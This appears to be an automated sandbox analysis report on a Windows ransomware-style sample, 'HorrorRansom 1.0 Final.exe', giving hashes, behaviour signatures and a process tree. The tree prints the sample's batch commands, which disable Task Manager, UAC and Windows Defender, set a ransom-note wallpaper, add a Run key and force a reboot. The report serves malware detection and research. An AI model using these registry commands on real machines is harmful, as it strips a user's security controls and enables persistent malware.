Analysis

  • max time kernel
    4s
  • max time network
    7s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-11-2024 14:13

Errors

Reason
Machine shutdown

General

  • Target

    Dest/HorrorRansom 1.0 Final.exe

  • Size

    1.7MB

  • MD5

    1a8e74c4bb9a2c5b38b4412a6b484737

  • SHA1

    c01eb730609125dc55641d1aa377d890941b9e83

  • SHA256

    ed73b148716d6015b1466ee92cb331070a90d8a433ee768984cec665970fd327

  • SHA512

    a531fb0fb00dddfd379086d2f0f868447fe7d111d242ecfb27fd468d75dfb6761ee6c13b2fb73a0ec8990b86ce1fb0407a47c2223c712a6752d3ca096c5cd204

  • SSDEEP

    49152:ot42t5QZkBhBhyKui/2gDSr8XTh3FQ+G7wKC:2QgybsbDBYwK

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
    "C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2140
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        • System Location Discovery: System Language Discovery
        PID:2732
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2524
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2500
      • C:\Windows\SysWOW64\reg.exe
        Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2816
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4812
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown /r /t 00
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2444
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:4880

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd

    Filesize

    1KB

    MD5

    47f426fb3883f2da30e9aa2a7d693fa5

    SHA1

    50d843d68817717f21ba96d26a571ad996a5e35a

    SHA256

    b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b

    SHA512

    2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

  • C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe

    Filesize

    72KB

    MD5

    c875f76e521f520404401122bd82630a

    SHA1

    3b1c78420a55b9a768b28168753c4e22982421ef

    SHA256

    a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11

    SHA512

    b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

  • C:\Users\Admin\AppData\Local\Temp\81C3.tmp\note.bmp

    Filesize

    5.9MB

    MD5

    ed30c76a614ec8db5e4ac22e2929f53d

    SHA1

    27ab24ede0ec37cedd2cbf4d9f7135375f031fa4

    SHA256

    96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a

    SHA512

    ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b

  • memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp

    Filesize

    6.1MB

  • memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp

    Filesize

    6.1MB